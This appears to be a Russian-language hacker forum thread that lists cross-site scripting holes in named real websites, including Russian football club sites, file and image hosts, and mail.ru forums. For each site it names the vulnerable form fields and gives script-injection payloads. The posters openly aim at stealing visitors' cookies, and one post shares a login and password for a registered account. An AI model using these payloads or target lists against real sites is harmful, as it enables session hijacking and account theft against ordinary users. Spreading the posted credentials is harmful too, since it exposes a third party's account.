bloggerswap.com

Заводим акк на этом ресурсе

затем редактируем инфо Edit Account Details

в поле Website Name: добавим наш код:

">'><SCRIPT>alert(4)</SCRIPT> жмем edit my account

Цитата:

Выкладывалась как то sql inj ====> equipnet.ru \выкладывал ее не без известный и всеми любимый Дон Карлеоне привет Дон \

http://www.equipnet.ru/job.php?beg_msg=0&end_msg=25

Добавим новое сообщение

<SCRIPT>alert(/Привет девчонки!/)</SCRIPT>
жертве нужно кликнуть по ссылке моего объявления и куку гриня

ehbsr.com
не люблю я все таки американцев
Нужно иметь статус зерегнного пользователя вот:
User:birch64
password:ywrcws
тыкаем мой аккаунт и в поле fist name втыкаем:

Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration
Уязвимые поля:
Фамилия
Имя
Отчество
NickName
Место Жительства
В уязвимых полях пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Луч-Энергия"
www.luch-energy.ru/?search
Уязвимое поле:
Ваш запрос
В уязвимом поле пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Локомотив"
http://www.fclm.ru/s-info-center/
Пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Амкар"
http://www.amkar.ru/reg/reg.asp
Уязвимые поля:
Логин
Город
Веб-Сайт
В уязвимых полях пишем: "><script>alert()</script>
Регестрируемся
Заходим
Вылетает Алерт

хостинг картинок
http://images.i-files.org/

в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт

-------------------------------

"Знаменитый" украинский хотинг файлов upload.com.ua

Заходим в аккаунт и создаем каталог с названием "><script>alert()</script>
Получаем активную xss

PS upload уже профиксили

http://ul-rocksite.info
Переходит на страницу чата:
http://ul-rocksite.info/index.php?page=chat
И в чате рисуем следующее:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
OPera Версия 9.23

вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)

mail.ru

http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)

кстате и на forum.lady.mail.ru тоже работает)